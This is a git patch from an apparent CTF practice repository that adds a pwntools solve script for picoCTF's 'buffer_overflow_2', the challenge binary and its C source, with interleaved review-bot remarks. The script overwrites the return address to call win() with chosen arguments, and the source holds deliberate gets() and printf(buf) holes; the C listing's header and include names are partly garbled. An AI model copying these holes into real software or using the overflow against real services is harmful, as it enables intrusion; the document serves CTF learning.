From c56300256d0bcc30547e07d9a1eacf821697461d Mon Sep 17 00:00:00 2001 From: h7x4 Date: Tue, 3 Sep 2024 19:46:13 +0200 Subject: [PATCH] pwn/buffer_overflow_2 --- pwn/buffer_overflow_2/solve.py | 31 ++++++++++++++++++++++++ pwn/buffer_overflow_2/vuln | Bin 0 -> 15808 bytes pwn/buffer_overflow_2/vuln.c | 43 +++++++++++++++++++++++++++++++++ 3 files changed, 74 insertions(+) create mode 100755 pwn/buffer_overflow_2/solve.py create mode 100755 pwn/buffer_overflow_2/vuln create mode 100644 pwn/buffer_overflow_2/vuln.c diff --git a/pwn/buffer_overflow_2/solve.py b/pwn/buffer_overflow_2/solve.py new file mode 100755 index 0000000..b3dab5e --- /dev/null +++ b/pwn/buffer_overflow_2/solve.py @@ -0,0 +1,31 @@ +#!/usr/bin/env nix-shell +#!nix-shell -p python3 -i python3 python3Packages.pwntools + +from pwn import * + +exe = ELF("./vuln") + +context.binary = exe + +ADDR, PORT, *_ = "saturn.picoctf.net 55214".split() + +def conn(): + if args.REMOTE: + r = remote(ADDR, PORT) + else: + r = process([exe.path]) + + return r + +def main(): + r = conn() + + print(r.recvuntil(b"Please enter your string:")) + offset = 112 # found with pwndbg + payload = b'A' * offset + p32(exe.sym.win) + b'B'*4 + p32(0xCAFEF00D) + p32(0xF00DF00D) + r.sendline(payload) + print(r.recvall()) + r.close() + +if __name__ == "__main__": + main() \ No newline at end of file 
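Review bot: The payload built in main() is consumed by gets() on the target, which stops at the first 0x0a byte, so if p32(exe.sym.win) or any packed argument ever contains a newline the chain is silently truncated and the hard-coded offset looks wrong; guard it with `assert b"\n" not in payload, "gets() would truncate the payload"` before `r.sendline(payload)`. The `offset = 112 # found with pwndbg` comment would be more useful if it stated the derivation so the value can be re-checked after a recompile, e.g. `# BUFSIZE 100 + (presumably) alignment padding + saved ebp = 112 bytes to the saved return address; measured with pwndbg`. The `b'B'*4` is the fake return address win() returns into, so the process crashes after printing the flag; a short comment saying that crash is expected would stop it being read as a failed exploit. The file also lacks a trailing newline.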
diff --git a/pwn/buffer_overflow_2/vuln b/pwn/buffer_overflow_2/vuln new file mode 100755 index 0000000000000000000000000000000000000000..accb967c62baf9a39e56548a7ce13c01279497fa GIT binary patch literal 15808 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 +#include +#include +#include +#include + +#define BUFSIZE 100 +#define FLAGSIZE 64 + +void win(unsigned int arg1, unsigned int arg2) { + char buf[FLAGSIZE]; + FILE *f = fopen("flag.txt","r"); + if (f == NULL) { + printf("%s %s", "Please create 'flag.txt' in this directory with your", + "own debugging flag.\n"); + exit(0); + } + + fgets(buf,FLAGSIZE,f); + if (arg1 != 0xCAFEF00D) + return; + if (arg2 != 0xF00DF00D) + return; + printf(buf); +} + +void vuln(){ + char buf[BUFSIZE]; + gets(buf); + puts(buf); +} + +int main(int argc, char **argv){ + setvbuf(stdout, NULL, _IONBF, 0); + + gid_t gid = getegid(); + setresgid(gid, gid, gid); + + puts("Please enter your string: "); + vuln(); + return 0; +} +
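Review bot: The `gets(buf)` in vuln() and the `printf(buf)` in win() are, as far as the commit shows, the challenge's intended stack-overflow and format-string sinks and should not be "fixed", but nothing in the file says so; a header comment such as `/* picoCTF challenge source (buffer_overflow_2): gets() and printf(buf) are deliberately vulnerable - do not reuse as a template or run outside a sandbox */` would make that explicit. If this source is ever rebuilt, win() prints `buf` even when `fgets()` fails, leaving an uninitialized stack buffer to reach printf(); `if (fgets(buf, FLAGSIZE, f) == NULL) exit(1);` is the defensive form. The `diff`/`@@` header for vuln.c is not visible in the patch as extracted (it is swallowed by the preceding binary blob) and the angle-bracketed names on the `#include` lines appear stripped, so the listing should be compared against the committed file.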